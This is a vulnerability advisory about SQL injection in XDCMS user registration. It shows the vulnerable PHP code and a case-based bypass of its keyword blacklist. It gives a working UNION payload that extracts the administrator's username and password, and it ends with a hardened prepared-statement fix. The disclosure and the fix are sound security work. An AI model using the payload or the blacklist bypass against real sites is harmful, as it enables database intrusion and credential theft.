XDCMS user-registration SQL injection vulnerability analysis - vulnerability warning - Black Bar Safety Net

2014-01-03T00:00:00
ID MYHACK58:62201441641
Type myhack58
Reporter xfkxfk
Modified 2014-01-03T00:00:00

Description

The latest version of the XDCMS enterprise management system filters input loosely enough that the filter can be bypassed, resulting in several SQL injection points.

The injection is in the registration function of the XDCMS enterprise management system; see the file \system\modules\member\index.php:

Registration calls register_save, and the problem lies in the register_save function of index.php:

public function register_save(){
    $username=safe_html($_POST['username']); // read the username; safe_html() is the only filter applied to it
    $password=$_POST['password'];
    $password2=$_POST['password2'];
    $fields=$_POST['fields'];
    if(empty($username)||empty($password2)||empty($password)){
        showmsg(C('material_not_complete'),'-1');
    }
    if(!strlength($username,5)){
        showmsg(C('username').C('str_len_error').' 5','-1');
    }
    if(!strlength($password,5)){
        showmsg(C('password').C('str_len_error').' 5','-1');
    }
    if($password!=$password2){
        showmsg(C('password_different'),'-1');
    }
    $password=md5(md5($password));
    $user_num=$this->mysql->num_rows("select * from ".DB_PRE."member where username='$username'"); // checks whether the member already exists; the username can slip past safe_html() and is concatenated straight into the query: first SQL injection point
    if($user_num>0){
        showmsg(C('member_exist'),'-1');
    }
    $ip=safe_replace(safe_html(getip()));
    $this->mysql->db_insert('member',"username='".$username."',password='".$password."',creat_time='".datetime()."',last_ip='".$ip."',is_lock='0',logins='0',groupid='1'"); // inserts the main fields (username, password); the same username is concatenated again: second SQL injection point
    $last_id=$this->mysql->insert_id();
    // insert the supplementary profile fields
    $field_sql='';
    foreach($fields as $k=>$v){
        $f_value=$v;
        if(is_array($v)){
            $f_value=implode(',',$v);
        }
        $field_sql.=",{$k}='{$f_value}'"; // neither key nor value is filtered; both go straight into the UPDATE below: third SQL injection point
    }
    $field_sql=substr($field_sql,1);
    $field_sql="update ".DB_PRE."member set {$field_sql} where userid={$last_id}";
    $query=$this->mysql->query($field_sql);
    showmsg(C('register_success'),'index.php?m=member&f=register');
}

For the first SQL injection point, register a user and capture the request:

Finally, the result: the administrator username and password are retrieved successfully:

safe_html() does blacklist SQL keywords, and it also filters = and *, but it does not account for case: only lowercase keywords are matched, so uppercase keywords pass straight through. Because = and * are filtered, the payload uses a conventional injection statement that needs neither. The EXP is as follows:

Enter the following as the username:

' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 FROM (SELECT count(1),concat(round(rand(0)),(SELECT concat(username,0x23,password) FROM c_admin LIMIT 0,1))a FROM information_schema.tables GROUP by a)b#
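All three injection points above share one root cause: request data is concatenated into SQL and the only defence is a keyword blacklist, which the case bypass defeats. The following is an added example, not XDCMS's own code, showing how register_save would look with PDO prepared statements; $pdo (an open PDO connection), the 'c_' prefix for DB_PRE (matching the page's c_admin table) and the ALLOWED_FIELDS column names are assumptions.

```php
<?php
// Added example, not XDCMS's own code: a hardened register_save() built on PDO
// prepared statements, so request data is never concatenated into SQL.
// Assumptions: $pdo is an open PDO connection; DB_PRE is the table prefix used on
// the page ('c_' matches its c_admin table); ALLOWED_FIELDS holds the profile
// columns a registrant may set (hypothetical names).
defined('DB_PRE') || define('DB_PRE', 'c_');
const ALLOWED_FIELDS = ['nickname', 'email', 'phone'];

function register_save_hardened(PDO $pdo, array $post, string $ip): array
{
    $username  = (string)($post['username']  ?? '');
    $password  = (string)($post['password']  ?? '');
    $password2 = (string)($post['password2'] ?? '');
    $fields    = is_array($post['fields'] ?? null) ? $post['fields'] : [];
    if ($username === '' || $password === '' || $password2 === '') {
        return [false, 'material_not_complete'];
    }
    if ($password !== $password2) {
        return [false, 'password_different'];
    }
    // 1st point fixed: the username is a bound parameter, so a quote or an
    // upper-case UNION inside it is plain data; no keyword blacklist is needed.
    $stmt = $pdo->prepare('SELECT COUNT(*) FROM ' . DB_PRE . 'member WHERE username = ?');
    $stmt->execute([$username]);
    if ((int)$stmt->fetchColumn() > 0) {
        return [false, 'member_exist'];
    }
    // 2nd point fixed: every value is bound; password_hash() replaces md5(md5()).
    $stmt = $pdo->prepare('INSERT INTO ' . DB_PRE . 'member (username, password, creat_time,'
        . ' last_ip, is_lock, logins, groupid) VALUES (?, ?, NOW(), ?, 0, 0, 1)');
    $stmt->execute([$username, password_hash($password, PASSWORD_DEFAULT), $ip]);
    $lastId = (int)$pdo->lastInsertId();
    // 3rd point fixed: identifiers cannot be bound, so column names come only from
    // the allow-list (unknown keys are dropped) and the values are bound.
    $set = $params = [];
    foreach ($fields as $k => $v) {
        if (!in_array($k, ALLOWED_FIELDS, true)) {
            continue;
        }
        $set[]    = "`$k` = ?";
        $params[] = is_array($v) ? implode(',', $v) : (string)$v;
    }
    if ($set) {
        $params[] = $lastId;
        $pdo->prepare('UPDATE ' . DB_PRE . 'member SET ' . implode(', ', $set)
            . ' WHERE userid = ?')->execute($params);
    }
    return [true, 'register_success'];
}
```

The dynamic UPDATE is the part a blacklist can never protect: column names cannot be passed as bound parameters, so the only sound fix is to accept them from a fixed allow-list and bind the values.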

Author: xfkxfk